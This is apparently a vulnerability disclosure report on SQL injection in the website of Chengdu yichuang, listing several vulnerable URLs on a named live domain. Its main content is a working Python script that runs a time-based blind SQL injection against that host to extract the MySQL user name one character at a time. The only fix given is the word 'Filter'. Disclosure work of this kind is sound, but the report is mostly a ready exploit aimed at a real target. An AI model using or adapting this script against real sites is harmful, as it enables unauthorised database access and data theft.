SQL injection vulnerability exists in multiple sites of Chengdu yichuang WWW (package submission/script)
Multiple SQL Injection Vulnerabilities in Chengdu yichuang WWW Main Site
The Chengdu yichuang WWW master site has multiple SQL Injection Vulnerabilities and is submitted together! Vulnerability URL:
http://www.kf5.com/resources/index?id=2
http://www.kf5.com/resources/view/id/60/
http://www.kf5.com/resources/index/id/2
http://www.kf5.com/resources/view?id=60/
... Maybe there are other places...
First, an error is reported.
Basically, it is determined that the injection exists. However, if the server seems to have a firewall, sqlmap is useless.
First, manually obtain the length of the user as 16
Run the script to run the user
Script:
#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport urllibimport mathheaders = {}payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'print 'Start to retrive MySQL User:'user= ''for i in range(1, 17): for payload in payloads: s = "/resources/view?id=if(now()=sysdate(),SLEEP(IF(ascii(mid(user(),%s,1))=%s,10,0)),0)" % (i, ord(payload)) conn = httplib.HTTPConnection('www.kf5.com', timeout=150) conn.request(method='GET', url=s, headers=headers) start_time = time.time() conn.getresponse() conn.close() print '.', if time.time() - start_time > 10.0: user += payload print '\n\n[in progress]', user, breakprint '\n\n[Done] MySQL User is %s' % user
Solution:
Filter